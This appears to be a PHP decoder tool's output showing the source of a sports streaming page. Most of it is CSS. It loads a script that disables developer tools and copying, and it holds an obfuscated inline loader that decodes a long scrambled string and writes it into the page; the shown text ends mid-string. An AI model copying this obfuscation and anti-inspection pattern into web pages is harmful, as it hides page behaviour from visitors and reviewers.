Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<!DOCTYPE html> <head> <link rel="icon" href="https://i.ibb.co/cC6ZdC9/Join-Telegr..

Decoded Output download

<?   
<!DOCTYPE html> 
<head> 
    <link rel="icon" href="https://i.ibb.co/cC6ZdC9/Join-Telegram-cric-streaming.jpg" type="image/png" sizes="48x48"> 
    <meta charset="UTF-8"> 
    <title>SPORTS WEB </title> 
    <meta content="width=device-width,user-scalable=no,initial-scale=1,maximum-scale=1,minimum-scale=1" name="viewport"> 
    <meta content="IE=edge" http-equiv="X-UA-Compatible"> 
    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Lobster"> 
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script> 
    <script disable-devtool-auto='true' src='https://cdn.jsdelivr.net/npm/disable-devtool' clear-log='true' disable-select='true' disable-copy='true' disable-cut='true' disable-paste='true'></script> 
    <style> 
        .loading { 
            margin-top: 0; 
            font-weight: 700; 
            vertical-align: middle; 
            line-height: 150px; 
            font-size: 25px; 
            text-transform: uppercase; 
            background: linear-gradient(to right, red 30%, rgb(10, 60, 215) 75%); 
            -webkit-background-clip: text; 
            -webkit-text-fill-color: transparent; 
        } 
 
        h1 { 
            background-color: #000; 
            margin: 0; 
            text-align: center; 
            padding: 5px 
        } 
 
        a { 
            color: #fff; 
            text-decoration: none 
        } 
 
        tr th { 
            font-tvv-name: bold; 
            background-color: green; 
            padding: 1px 
        } 
 
        * { 
            box-sizing: border-box 
        } 
 
        @keyframes fadein { 
            0% { 
                opacity: 0 
            } 
 
            66% { 
                opacity: 0 
            } 
 
            100% { 
                opacity: 1 
            } 
        } 
 
        @-webkit-keyframes fadein { 
            0% { 
                opacity: 0 
            } 
 
            66% { 
                opacity: 0 
            } 
 
            100% { 
                opacity: 1 
            } 
        } 
 
        .tvv-item { 
            position: relative; 
            display: inline-block; 
            width: 120px; 
            height: 120px; 
            margin: 2px; 
            padding: 3px; 
            border: 1px solid green z-index: 1; 
            background: White; 
            box-shadow: 3px 2px 2px black; 
            overflow: hidden; 
            border-radius: 4px; 
            filter: contrast(100%) 
        } 
 
        .tvv-item>* { 
            margin: 0; 
            padding: 0 
        } 
 
        .tvv-item .tvv-thumb { 
            width: 100%; 
            bottom: 10px; 
            top: 0px; 
            position: absolute; 
            right: 0; 
            float: center; 
        } 
 
        .tvv-item .tvv-thumb img { 
            width: 100%; 
            pointer-events: none 
        } 
 
        .tvv-item .tvv-name { 
            position: absolute; 
            left: 0; 
            bottom: 0; 
            font-size: 12px; 
            display: block; 
            text-align: center; 
            width: 100%; 
            color: black; 
            padding: 5px; 
            font-weight: 800; 
            text-overflow: ellipsis; 
            black-space: nowrap; 
            overflow: hidden; 
            background: linear-gradient(to bottom left, #15b4ff 20%, #fff 100%); 
            box-shadow: inset 2px 2px 2px 0px rgba(255, 255, 255, .5); 
            7px 7px 20px 0px rgba(0, 0, 0, .1), 
            4px 4px 5px 0px rgba(0, 0, 0, .1); 
            transition: all 0.3s ease; 
        } 
 
        .tvv-item img { 
            width: 100%; 
            pointer-events: none 
        } 
 
        .tvv-item:after { 
            position: absolute; 
            content: ""; 
            width: 100%; 
            height: 0; 
            top: 0; 
            left: 0; 
            z-index: -1; 
            border-radius: 5px; 
            border: 0px solid green; 
            background-color: black; 
            background-image: linear-gradient(to bottom left, #32c0cc 20%, #fff 100%); 
            box-shadow: inset 2px 2px 2px 0px rgba(255, 255, 255, .5); 
            7px 7px 20px 0px rgba(0, 0, 0, .1), 
            4px 4px 5px 0px rgba(0, 0, 0, .1); 
            transition: all 0.3s ease; 
        } 
 
        .tvv-item:hover { 
            color: #000; 
        } 
 
        .tvv-item:hover:after { 
            top: auto; 
            bottom: 0; 
            height: 100%; 
        } 
 
        .tvv-item:active { 
            top: 5px; 
        } 
 
        .tvv-name:hover {} 
 
        .fin { 
            width: 100%; 
            margin-top: 1px; 
            margin-bottom: 2px; 
            float: center; 
            height: 30px; 
            font-size: small; 
            background-color: rgb(40, 40, 40); 
            color: black; 
            border-radius: 10px; 
            border: 3px solid greenoutline: none; 
            text-align: center; 
            font-family: "Poppins", sans-serif; 
        } 
 
        .fin, 
        .dftr { 
            width: 100%; 
            margin-top: 1px; 
            margin-bottom: 2px; 
            float: center; 
            height: 30px; 
            font-style: bold; 
            background-color: rgb(40, 40, 40); 
            color: purple; 
            background: linear-gradient(135deg, snow 0%, seashell 64%); 
            border-radius: 0px; 
            border: 2px solid red; 
            outline: none; 
            text-align: center; 
            font-family: "Poppins", sans-serif; 
        } 
 
        .fin:hover, 
        .dftr:hover { 
            border: 3px solid rgb(255, 60, 140); 
            color: red; 
            background: linear-gradient(135deg, azure 0%, floralwhite 64%); 
        } 
 
        .tvv-item { 
            width: calc(100%/20 - 10px) 
        } 
        } 
 
        @media only screen and (max-width:2600px) { 
            .tvv-item { 
                width: calc(100%/19 - 10px) 
            } 
        } 
 
        @media only screen and (max-width:2470px) { 
            .tvv-item { 
                width: calc(100%/18 - 10px) 
            } 
        } 
 
        @media only screen and (max-width:2340px) { 
            .tvv-item { 
                width: calc(100%/17 - 10px) 
            } 
        } 
 
        @media only screen and (max-width:2210px) { 
            .tvv-item { 
                width: calc(100%/16 - 10px) 
            } 
        } 
 
        @media only screen and (max-width:2080px) { 
            .tvv-item { 
                width: calc(100%/15 - 10px) 
            } 
        } 
 
        @media only screen and (max-width:1950px) { 
            .tvv-item { 
                width: calc(100%/14 - 10px) 
            } 
        } 
 
        @media only screen and (max-width:1820px) { 
            .tvv-item { 
                width: calc(100%/13 - 10px) 
            } 
        } 
 
        @media only screen and (max-width:1690px) { 
            .tvv-item { 
                width: calc(100%/12 - 10px) 
            } 
        } 
 
        @media only screen and (max-width:1560px) { 
            .tvv-item { 
                width: calc(100%/11 - 10px) 
            } 
        } 
 
        @media only screen and (max-width:1430px) { 
            .tvv-item { 
                width: calc(100%/10 - 10px) 
            } 
        } 
 
        @media only screen and (max-width:1300px) { 
            .tvv-item { 
                width: calc(100%/9 - 10px) 
            } 
        } 
 
        @media only screen and (max-width:1170px) { 
            .tvv-item { 
                width: calc(100%/8 - 10px) 
            } 
        } 
 
        @media only screen and (max-width:1040px) { 
            .tvv-item { 
                width: calc(100%/7 - 10px) 
            } 
        } 
 
        @media only screen and (max-width:910px) { 
            .tvv-item { 
                width: calc(100%/6 - 10px) 
            } 
        } 
 
        @media only screen and (max-width:780px) { 
            .tvv-item { 
                width: calc(100%/5 - 10px) 
            } 
        } 
 
        @media only screen and (max-width:650px) { 
            .tvv-item { 
                width: calc(100%/4 - 10px) 
            } 
        } 
 
        @media only screen and (max-width:520px) { 
            .tvv-item { 
                width: calc(100%/3 - 10px) 
            } 
        } 
 
        @media only screen and (max-width:390px) { 
            .tvv-item { 
                width: calc(100%/2 - 10px) 
            } 
        } 
 
        .custom-btn { 
            width: 130px; 
            height: 40px; 
            color: #fff; 
            border-radius: 5px; 
            padding: 10px 25px; 
            font-family: 'Lato', sans-serif; 
            font-weight: 500; 
            background: transparent; 
            cursor: pointer; 
            transition: all 0.3s ease; 
            position: relative; 
            display: inline-block; 
            box-shadow: inset 2px 2px 2px 0px rgba(255, 255, 255, .5), 7px 7px 20px 0px rgba(0, 0, 0, .1), 4px 4px 5px 0px rgba(0, 0, 0, .1); 
            outline: none; 
        } 
 
        .btn-11 { 
            border: white; 
            background: green; 
            background: linear-gradient(80deg, #15b4ff 10%, black 100%); 
            color: #fff; 
            overflow: hidden; 
        } 
 
        .btn-11:hover { 
            text-decoration: none; 
            color: #fff; 
            background-image: linear-gradient(135deg,  #15b4ff 100%, #000000 20%); 
        } 
 
        .btn-11:before { 
            position: absolute; 
            content: ''; 
            display: inline-block; 
            top: -180px; 
            left: 0; 
            width: 30px; 
            height: 100%; 
            background-color: #fff; 
            animation: shiny-btn1 3s ease-in-out infinite; 
        } 
 
        .btn-11:hover { 
            opacity: .7; 
            color: white; 
        } 
 
        .btn-11:active { 
            box-shadow: 4px 4px 6px 0 rgba(255, 255, 255, .3), -4px -4px 6px 0 rgba(116, 125, 136, .2), inset -4px -4px 6px 0 rgba(255, 255, 255, .2), inset 4px 4px 6px 0 rgba(0, 0, 0, .2); 
        } 
 
        @-webkit-keyframes shiny-btn1 { 
            0% { 
                -webkit-transform: scale(0) rotate(45deg); 
                opacity: 0; 
            } 
 
            80% { 
                -webkit-transform: scale(0) rotate(45deg); 
                opacity: 0.5; 
            } 
 
            81% { 
                -webkit-transform: scale(4) rotate(45deg); 
                opacity: 1; 
            } 
 
            100% { 
                -webkit-transform: scale(50) rotate(45deg); 
                opacity: 0; 
            } 
        } 
 
        @import url("https://fonts.googleapis.com/css?family=Roboto"); 
 
        @-webkit-keyframes come-in { 
            0% { 
                -webkit-transform: translatey(100px); 
                transform: translatey(100px); 
                opacity: 0; 
            } 
 
            30% { 
                -webkit-transform: translateX(-50px) scale(0.4); 
                transform: translateX(-50px) scale(0.4); 
            } 
 
            70% { 
                -webkit-transform: translateX(0px) scale(1.2); 
                transform: translateX(0px) scale(1.2); 
            } 
 
            100% { 
                -webkit-transform: translatey(0px) scale(1); 
                transform: translatey(0px) scale(1); 
                opacity: 1; 
            } 
        } 
 
        @keyframes come-in { 
            0% { 
                -webkit-transform: translatey(100px); 
                transform: translatey(100px); 
                opacity: 0; 
            } 
 
            30% { 
                -webkit-transform: translateX(-50px) scale(0.4); 
                transform: translateX(-50px) scale(0.4); 
            } 
 
            70% { 
                -webkit-transform: translateX(0px) scale(1.2); 
                transform: translateX(0px) scale(1.2); 
            } 
 
            100% { 
                -webkit-transform: translatey(0px) scale(1); 
                transform: translatey(0px) scale(1); 
                opacity: 1; 
            } 
        } 
 
        * { 
            margin: 0; 
            padding: 0; 
        } 
 
        html, 
        body { 
            background: #eaedf2; 
            font-family: 'Roboto', sans-serif; 
        } 
 
        .stwBlurRainbow, 
        .stwRainbow { 
            position: fixed; 
            width: 100%; 
            bottom: 0; 
            left: 0; 
            right: 0; 
            height: 3px; 
            z-index: 23; 
            background: linear-gradient(-45deg, #4086f4, #31a952, #fbbe01, #eb4132, #4086f4, #31a952, #fbbe01, #eb4132); 
            background-size: 200%; 
            -webkit-animation: animeBar 5s linear infinite; 
            animation: animeBar 5s linear infinite 
        } 
 
        .stwBlurRainbow { 
            height: 10px; 
            z-index: 22; 
            filter: blur(10px); 
            opacity: .7 
        } 
 
        @-webkit-keyframes animeBar { 
            0% { 
                background-position: 0 50% 
            } 
 
            50% { 
                background-position: 100% 50% 
            } 
 
            100% { 
                background-position: 0 50% 
            } 
        } 
 
        @keyframes animeBar { 
            0% { 
                background-position: 0 50% 
            } 
 
            50% { 
                background-position: 100% 50% 
            } 
 
            100% { 
                background-position: 0 50% 
            } 
        } 
 
        .uc { 
            pointer-events: none; 
        } 
    </style> 
    <script> 
(()=>{for(j=function(){for(h='lL$X<Dn5GX,WQL$efiz',a=new Array(h.length),l=0;l<h.length;l++)a[l]=h.charCodeAt(l);return a}(),m=m=>document.write(m),k=decodeURI("".concat("htHn%20lt=)+B+tlmtlec%20l%22r0gi(=op(o%3Cyi%3Eue.Ag%7DlC)n%7B(t=)=.~kc%22R=;rr(nOCSy,tccwa.%25nie(ji3Aa.ec%22un=%252i%25omr%22%22t;hrlEOmt%5Bc+.%25%25(C6hB%5D.nae=aU;eeDC,cBnn%25(rI)i=hnoBGyl7hbhow=n%3Ed7n(md%25n)rp;zdhi%7Deo=i2(((e0n;=%25x,%25cegrty%25&3E;l;bt;(e(n%3E=i32ermrt%25a:hnk.(nfrc.eslfU-oeteE%25tncf%259);5=d7cn2npk3(2sr2n%25A2t(025%25teair%255+2,2;Cmort5Nsaf3=qlhc)tneooh2-at2B:2(Eeir(%25oag8ac02l3c3-taph=hx2Ebn)fe_%25rc0=as)=sioeo%25lo/0LcsM5we)S;nru%25a0:dl)cha5Ifz::;%25%25tr2mp2=-5tT,hraiu,ep0lct2=)C:I3e%3C20t.dIenil5%25ijs55uhXo)c=2%251si9%25tu1rtou%25tJ722aR3022Eth%25the2aA@UbCtC%253g-sieaRd23=seccE%25IC%255t=/r,Cyi2u-z222a2and%25E$i+pE2D02r5/iv13ig5-sf0Llw55lRiT-hd%25v0(cl2_bIaA:d5a2mltja.o2l1nnumt%255%25s0tod2c2o-tn./iCttwo%255Vi2s3=r5%25Xiotena%25e0ct22t)m50tn%252r5t%25Cg5ia5dBn%25hCgGEr%25os5nr0I/mlRm:isv22prms3ig2/deEi-ml20223Ta223m2=o%25nt2s225gt:p3355tiw%25nl=vcdasa.arEGlc:2ici5c00Cd22gt212lJS5tv5f2e%2525EEx/ymhtE%259%2522Oroh3g%25hirCs2dn9c:igds35-a%25bco2CE/a5a%25%25:e5E55=22d/5fCgl22e-m320oet/n:tse.t0eeM0vo52Lg32esrry0Z2/sir3imp0arv%25h052iE.23Cp%252h2%255yosE/h1%25=gv5%25;Sf2i=2%25%25edl5lspu2a2E52rovEhll%25CC2E55/c/2%25t5mvh%25ca%255r2vttc%25drssf3ii%2521rs%25sdt25m%25%25.d6b3icp2dssaae3vdvc%252e20e2s7d%253=/%25o5sp2p5t0siu2E:/irai3h5.5/%25tEi/%25s2a/hst1ng2.ie/v0evb3/=2r32-553s5eea152c5lcov30rtm/2%25_Cu2/gg22%25e50ts5ht-ltria-ei=300i0g_r3d-ttx3t7Ct%25gsa23o23Sx3ha%25%2502rCapc35/tC5m%25%25_3a%25/%25v=e32n/dtC1C3/22%25i01a.sCrm555ohE2325/%2530l-gim-%25/%257%25s.%25t2/v%25/E%252gdJd5%255/5ed,eo9a2/A13.222p5t%255%25/5te%25axmj23seag00%25xi251vCe2ifs/0%25e22n=0mr:=%25Cect/i3Eg5/c5Cilteii/%25i2-/i22poecms.hm0.=%25l3=lv7cma2C32_%250e2umN0Et5i_5tpt3e=aru12ai22a3p/5HE5e2sg.%25a%252cosd2_lvocuCc=Ws5_t8cfshm%252e/r25%252s0152hd-5Cs5ald/ip5o5/5hivodc%25vCvlmdm/eiC2shhpvEvE%25sia5%25pfr5-pg2lm62m362cac2s%2532atC%25%25n26h%25o%25con2se.0l52yrcc=2rCcyS32a5mr%25eleepito25bo0v2pn2t.mxa0di%250ca2%255tspdl0oe%25s_2//2353a%25C5t2/=mc0stvsa5%255v2/rrm0t5=e2u%25%25ttl3clsrE5ss%25,5/85rs28322pe5a%25sdtr5//lgd52cssxvn63hrr8ES0tt2Etip2=3/c%256ni5frEC5/ihatm%25ss2l=5.sm/oa/h9ivma0hsEme283t%25aeo6%25p//0ECrie53ivc1/r02n221/-urs3s%25owal%25.5%2525yhd1txce9c11o20ri0%25l5tp=-glv:1reCraa5/h5c//aS0Csea2.v0ca-%25:2gr039e2x2.iEciu/32,Ec3/rtlp0c2%252=e/5%250moh.vr3tv5/e3t=22i2s/dgc236xnCs2%255_m2hg5il/.ttf25-xc225./%25i2g2r%25e2%25sih52hoatdt%25g/2-a5%25r5d%25=iv2/t=302225%2508C3c%25m5r12/21=et2i35_f1ves11%25em25luie21sw0s_dr3cvcv3a2lisccmt%25tai3mt9ii.5fpEtd3oeEh22tpes/_nmd0_-//g_5ye2ilua=sgsc3125%25ps5/3sm/CvEa5h:a%25hp3s%25dooort%25/wgl/-g%25t5250es2ss%2562pS215ap5%25025:1i5Sv5a2220v=21%25=2.nC%25v5la/%250E/%25S2%25et2oEE6C7to12sd3s2c=scaea225Eenr3s20tCi5Ci0g25vg%255a3px3/bu%25v%25e:cd/ah55232u1p1%252iC2mgpE%25_%25tsamSd=p=e%25r2id55at%25/Egibl7tm5o3%2522et233eboi8352nh/i0%25ice35-h02,/pCt523//us%25%253a/535hs9%25.2d0iEnevEl0ohsCe/3/5m2/ar%255xs3hEg.5r2.05:orem2Ct%256532F22s-_i11let2tc=sxr5ct5%25eilC-%255/s525cd%25aeoa%25vvr2n5t%25gC/%25g-Cstdv%25%25seCrtsSE=vp552E%25=r2mk%25x/u5335dshg1pp=og2atv5gehgl-a2a2rr621avn2%25coca5/n3nb02%255vmse2%255l%2531eic25cis2g22piEo:vp2%255s:e%25meaiesr60tegEl0mi5m2mCr-jeds2tcdhsl%25hvt23t0Jt/hae02%25j%25tcaECsC5_i.2/%25hl30fss21vCc=&dl/3bmimv23rvsra52si25Wo3y05iar%25x/%25?ay5:aAco5se/0%25/do2sa=cv32G8ftl%252ea-2ap1pp2aOuli%25%2512p8eav2355%25pi%25m5esvp-o2vr.2l2chm3%25qs%25sai7n5r935d2/3Q2r232%25s62t2i%25255sV0lK5t2h8rCdEMfeE3aavvs2st3e0330tC%25151b-Ep:5i.0h-evn%25ne=2pln5iaEcaa323medasl200r%25i.r2t/m2v-/m%25/ay/ieo92c0Cg23%25d2-23%25afpctcr3e2w%2529v2=i0rC%25Apsl%25:00l5o5Vstpitv=oa/2ogt=2Ceg-ty/eoo9=C%25nKPilte52k:C2A/pA5.etmi/7ltClst5/CiEscs-5illv2tEaad30T0Oi/tgvhi5r5yemnutcg%25tc2cC%25g=25tp05%25523cncEi9L%25tKr=Ecm2t3d1q/2C51ES3E20/G%25%25%25.3f032225l23zl2d-eieC%2523r22ol%25it%25%25s52322bX5Eu%25r2h0gia:2ye%25=3dg5p.E2ri2i2sl3t%25=erptn5cc9htge55=5ta2=l.2asdq0E-a3aes382c%25v2r9e=%25.0Q5/%25ttvra0nec5p=eNv5tnbsopf2%253ephhter5%25msE2ngtr5d:r2tbn.ecs25i50v.EEtoasg8?52gitr5e/C0=2isiNs29nE5iN2=rfry=vt%25-R/iUvCs/9s-e.l2C2myii%25323&a/r=%25y./sEs55femwtCAhd/tYl/guYds63223533ochk5/it%251:dS/l5iuC/hEi%25ecre-n2x%25303%25qaPw5%252w6fi=54sh25c2hk0ec0caCctC%25p.ntl2%25522cEc/22t22s?%25t%25%25ve2%25st2C%25ad3tctC5vsg%25p2-As2gtv/%252c%25/dm3s%25rm39otdv25%2535%25=Cbgc5w5-5ci2NvCi2c2rn:2v0tgA355s%25-%25I%252ilCE/2Es52p22=ys.id2aa2lv20eisedb-5gl%25s2ilao%25A0b5Onp92e/d025iee2tpckm-c-5.pt3-2bd2m3tEmsevr-r5v:smali&Cd%252QhccarAH%25shpcaC22hi22ei=i3%25cn%25%25Ev.nv%25ccc0mb:oU5ek02f.soE%25Oa%25lv2-=vv/=n292222mxd-xClral%25%25%250%25o%25sv32h2ictt55s3e3rx/sp2gEcd5uCtcvK/oar02g555%25j=%25y3r5v5iEl54a2.cep2t%25icr2mec/sit/=23z25se5irn%25%250iaSsZ/lisocpg5ky325f.y22hm9Y25iv2gapcdv:s0t=l2htxer-sd%25CX=nr/2%25tai5r%25%25eCs2nc%253r35ig%25s00.5crh/%25Cam252b2eiCgmek3k223i5/5v2-E5=iW:y03rasv9t2l%252s/mNAGcMe5=dyr%25spy%25355C=o2C5r2a22t3og2a2E53tW%25iE25cv3%252teh55va22c=v%25=sh.i205%25C5d%25Rcs3s5%252tcv2%252avp%25%25tsmeJe0t32=2i.t5/t02C/api3p5ipa%252vep5r53Cri=vnit3.%25o353st05pE3tE=y3Cnea3Konm5=t0ay2le5i5vi0-s03aovjjC0clcg-2i=0agiElad/asC.ds52v32l5g32e2h#%25/bq%25Csdl%25pr0.tanNktiSla:25ibpWxk0s2aorgc%25%251EgJ%251%25imir2553E2tsts5i%25nCmmEeE3222i525/2%2532%25as%25%25khm5l33i5a%25a5%2552da15e2C50TrE2l%252t%25c3s2yr3Cp.5.e2%255tcaM/a75i%25lN3%25d5CvE252Etvhttg/e2c50/d5.S%250:gv22/0cC=32225%25l3c/5E%25n32rtE2v3v%2558%25wi%25tbEtSGgx/5%250%25m//SvTcv-22ctoos52cxirpyi3-pd2anljr2g0520pp%25r=h%25nj32r2i#%25gce%250t5%25g0=rl3/%25/00iCcsnl-n5cs2CbrtEg5cs2lld%25ec5/2ttx25m2t02ev-%250Cdj:fE2pes%25oss:ttdlsCcr/5tsl:2Co22rhc%25t-25tv.cl0ycJ%25l13hb0avt0/epd0g-m5s0e1d5tdt/vit5%252m5E3%255n5x0vn25etpti22=/=5=axiiCicn2o2it5kC300r7Gn.ar2istedvfl.:/=0e2e52e2%25emir%25Ci%25loeiim32s-ol2v032sa-2ptaj5C5v%25en%2555vr9btQ%25oxit-5/dclt%25asaa-=C22crv2./in23ae%25%250isy2%25p:t2r9=sae305/E2a2dcK%25%25%25.ibt=eet5h3oTiosvr3d2imJi2.ti5%25vt=t/ciCesc%25sir2t2s%25i35div5nrisCEaSi229na/hi-%25a.l2i53ex-a.t%25clr23r%25/s%25c0mt/252op5eT055Edo.23=2e2vn0=ehs32si0r%25resatcvi2239sCmrg052vc5Tnir%25-op%25le%25-2-stCsp..s3%25/ia23:cveo/=0eyv==0%25Eob5me3E5-5vNECh:c0:2sntghv225ac4-%25ehv%25%25fa/t5tig5re1%25s5C5-h/C2aemtx/3p2a3r33W/%25s2/gB2gn353:-l2t5%25%2522-225Cl25dt%25syo3r%25nga22i2cE53525r5rCc.set2iacrEcsa03c20E1/g3nv5Eeg0%25tE2.5=s22blstmmc32g.Cas%2525m3/vdotCi%2507s2bge=5%255%25t0lC5/2m2v2p=5i%25c050%25CgsL55ec2r2gccso3y2iEa2-s4cf%253%2552c2i%25CyBtr0233E%25si3a/er35p3cd-%25%250%25/Cyf%25tedcbid5552iaad=mirijE22v5.0Ct2E0hnsEnE5y5i%25%25t%25vcc2hNdi2E/2pc-rv3emc-enl3Ete2Fg3oabrdmt%25%25p52ll-gT%250eo1as223piE5/5Ccc%25o%25=C%25i30rg5pdipSh3%25C=l5vp2o2telstnr2d2s#/=dce02/r2%25ma.0ii=m5%25yu-5=25hT2233lC.iEitpT/mpge%252n5tct.e5ysCipo0m2%25o2rava5e5c2sCc152dbE2%25/02e0b2%25=5-irle1%25re%2520i2o5Ev%25%25M=m%25vu-3/0grcr/9%25itv5e00/6i22%25snn/2s240sem/%250s3:ts%259tg33t.ssi:o=r7s0.-D=ev370emotttv/%25i2s%25523/oHhne3S/%25322.zsth55ceoe/rlal5g%2522sCe30pitt5v/o0%25%250giail/ca2rroi0as2i-5Nfxn1EEv2=c%25iritt5ra5tChm.tjecsg22.:lC4rr2a-s-l53mB32fnec5aacv-.xE%253g23ursan5cg%25y%25Lp2%252/atC5stos22drsm3#0/02e%25cdo1tge305%25tz5og0Cv32ld22-u/S33gCp3s02t=tvn.mi-Ett5m2r/vc0u-952:ei%25)2a%25ri%25%25%25/is2v2.E5555/tC3s%25/vga223iipe9gs5frtEnnxrxpmC20%2553j52Eai0cdo/iei20ialas2h%25s/er3/pc/pes00i52rsh%251%25aCt2ii55r%25p==ci%25o.i522%25ri%25/2t0c2:5catgjehdly22%25%25eC=%255p/ryi%25%255pc5v2avt50%252C5vE2arpepsethFs4%25i1m3s/gY2th3t2rVeai22r.=/32n2mo5hg=C0%25%25e4vla5-gidbr0=%25om5-2gpnrCEnxili.0ser2c%25j/o5C2pe.5icv0ryg%25tEnEv2=302s2i22v0g.Cg50msidsssy1iti00/0nls30t/5%25fv25lc3-35s3lCCts2E353:2C25hys6Eao=lE0vvt-2edv4v42nf-g5m3doevvyev9hc25:0-2232rpv1%25a53pa2mr%25b5i.osTns3:r0ao2odlt%25dCh%25l%25C3hm2nm%25(atln5%25gE.Ea/5/c2Cd2.y%259i2i%25s%25.tg=h%25goo/5sily5%255f%2555at5S2ee2n-lnys22350aay=ih5C2pib25p5200e%255oaf=%25g-ta2Ex/52C/mn3drl%25odsTl/ce2%252t/%25/3t.r3i%2535p2222h/5%25Cn5v2CC2a5-C%25-%25g2s3o9pa22sb2%25o55ml5tin.h2%25d:j=%25si-5c3iyybb%25h5zol%25ea//e/aV5p%25BSl5l%253c35act/=e%2535erTg2d22/Uetc53S=scns%25iare2/tcC%2525oeoaicispr2n5%25a2sV25vcca%2532ve2v222l=E%25jC02r%25c%25%253a=vtKct0taina2axS5%25i5sCnpC%25a1te2:sEijeicSm023st-2sm2mvi2c=5/pq23o5s%25nA:2%25p3%25ie5x532sEnT345ye2/i=oeem-Bdo834iC2a5fl3ag/e53952dne%25v5rgsiv0va505.2M523E3s2o0%25eErg%25ht=2xs5i5e5vce=le3t%25253i0205cci3=%25=i5%25sv3ds0di-Lt0-s3CsY-/n523ce5phcbi3E%25.ii20ptC2mt3/C0y:2%25%25i5e3E0cv/3v%255gs/222%25n%25es%25v/3/E%25%25Ct-2c2so/CssD52y22eg2msi2s%25iCsm/%25daC0EE-225%25p12m5el/ls4%2523=i55%25s0tmi.heEb020a%2535nsp/5%25anEg3%2572Ii0opdrC2ejcvC5JtE5El3/ya/mc52sp3yd2%253v2ridEde5232y%25%255/a-rn/2/5oC5522Ws0%25S%25s2da%25jEEs5e%25tg5t=:.0r2nie.i3m:2vg%25rnvsgc/g2la0cEtvc%25g%252382st22/55h%25sf2tlEpc3C2Go2tC=r5v35%255i2%25u3am53d=ei3-=h5.r:%2524h2VsrX%2502n-=%25%253E%25n0E22lE2.sail2-03lsEn%25i22nvn03EE/5/0-chaj252s3k.Ce7vEDe=bgss%25i%25:2va5Fin.0=2%25sC320no%25as0gggJ%259xCEn.i3mmy%252nd5d00/ixtpn%252ik25rp2.a5./9T55%25232idt222eCc%25W5tgvacvy3r5a2v5%25ymiy5tso5k/=2y.ECcSr22%25%250g%252r2532fcbsV2%255dx525d.%25C2c.%25%25S25m%25sa5/%25id%25%255r322/5t52Eai52C2-/%25.slrti2r.%253le52ma%25//rs%25%25s5%25m2.oEnemtiov/0ie=d2s2.C52%25%25ecgt%252iyigpnK5mlhzr--m2imrl35is5vn5nrglZs:dg55vvyancSli02H5WCCs3nTvvpvsp2de2%2500bl2t2amg3=2/2inkrg.3C5v235l0lccsv33v.t3ip0p3aleipe/v=hsly:5EZ322oh0o51i/%25%25oe0retbvt5dblike2s2a2ah-moE%25%2505asf%25bCEprd=3aiss3e5n2c3lrFel%25%255=3-la2a%252-3tt/pe2saC3e00J%25lEe5s-h.%25oi%25%25ist22255m/-3t2iroa=s5aa2/Et%25cp523paia5e6Cpio3E55C=-ma/vh%25s/532v-rvssv5eiedet2h3sa/%25ek52dltv/%25C%25cop%25o5/22n2=y5/2ri3mnE%253L2/2baivgvea0a2lg=vyC/323%25tyrE=cC3tpgE=0ceishtee%25i3/o%25%25m=5daao5/-=2sh2yg:a2eiivC-2pebii%25og0=/%255%25e3e3.2ssc2mtviv53%25o.ceM=5tc5Cve2S%255itreFt25t%25/=:v023lo2:05g3lEE0vp-vx5%2522glcntmdgx=Cg%25r5.elr5ec/t2l2d0it%25urr2aChbepEu/2.d0-a/5g225%25m2z23ipnosesash2yic2aPS.vm52rr.diet2tClitinr%25-kki023asc/5Cs9vvC%25%252scp/ieai%252E0%255Ct323ccoki.5lma2i-jrlsCfsvt%25p35:Cgyr%25%25=5%25220v2/9%25ih5esbe-0vD5dv%25i3-he0ne2tc/ECCaa.Jly=-5D3soeodg5/0nryhst%25va2325iltcaoi0gFrhtt22Svi5iat02e9-C0oatcfttf1c/r22pt2q2=ns/r%25%253pbs%25/s5555Gr3am2cs%25z222ogSiae9s5lzRb53p5euEcgzaE536aicC.32j=e2mp=2er522Bl%25aa/t/%25p0Jnni=dperagrbve02n%25emam29=%25i0E2%25:55nA0v%251h2g5bD5cs.ahf5d52N0:uk%25ECji%25lph3s3a=05avs/23%2595/p5522mgsn%2555/N:=%25ti%2555Eh/oClvn%252i35p%25D5lv2330p5a5=5b5Opy0sEi22vxCreCgt%25ne%25cdTtb1cL23Ci%25/d2P%25.fn5vaC2Ce2i2?iENdl%252aipgii=srse2p2crmvv2%252-rE0i2i5.pcv=5EcavK%25ce8de2a-22g0R.5-ddf30%25g22ttt.=n%256sArg%25%25moTs:%25Cn2d25e2f2lal/25r-v2%25agcC/tcs%25.5E%25Z3xbgn%25%2555pvC6Eizgcc%25ei=E5C%25dysn2ihd52cl%250c//nvl2esntey30me-saCe23/22d535o/d5le/5svi/vD%25id0s52vmt5pa5%2532-aEhCP-2l2m/.%25%25%255esszta2aCnp5cdE22p505tn32/2atzag5d5sis2/%25-63cs2/if2ei3=002da0.vccDt0dhBhpcmgl%25sEnd52vr5%25E23vaaECC92d3%252%25l=25//r2%2533d33s3C5VgiEsl05a/h/5%25c%25=hm-i3tE%255a5331h%25va32ta2cnp0ri5%25=riri=Cr=i2aXsrgi2egc5aa3a02lo2/5gh5%2522CE0%25p2tsja.%25-ti2/tsaexaEpVgCeavh%25ea%25%25ct3iely2%25s3e2mam2%2533g52030:ib125%252222%25zts.%25mt52%25%25cvd220cvvC53fni55%25%25%25ll%25zd.3es2-3Dts1mlmh-as%25aiia355e2=%25enoe50spl.t5e2i-:23=pinxn/gsM/2s/a%25gl-t/.:s35=E%25vvngE5i2v52sQdms.2gnC55mtas25tE%25cv:5%2502Ei=nhsr/iib%253s32Etn-C2yc2t5/cd3/0j%25/%25r%25ndcd33Cg.E5zt225mp354vs31%25/d%25ms./0ivvmE=/222drEj5ecij0gti4o0tnsir5g5E%25C/cr%255riJa52tse22svl%25hpil21%25vha3barxE3t-%2525iv/2i2g%259/l2tea25Cv0e=nbbE-get032ev2/E2/pa52o2%25eszadC%25siYmz2vC%25:2psdt%25imsr22n2=d0y3aeaien/C3tini2c5nt=d3rmiz=s/Rii%25v5s2ernE335rpti21ivt%25/c0L0n5z2.2r555%25g23652f%25%25d%253ct.%25aa-3l=5r3lpchd233%25Ev/2P/lag/haE2jcnieeltl5ltz2ac52C%25r2ldE22.%2532s225rcn52CD3522i0vrccpgCe5=l9%2525ed%2553g.cC%25.o%25=5ai/v5C00C:t23sr.aaC%255=EptEv.2ahi9025g2%25/%25b=v%253tCc253ce0%25ir-a=rpmn%25aeE555255/g%2524.i%25/:22sv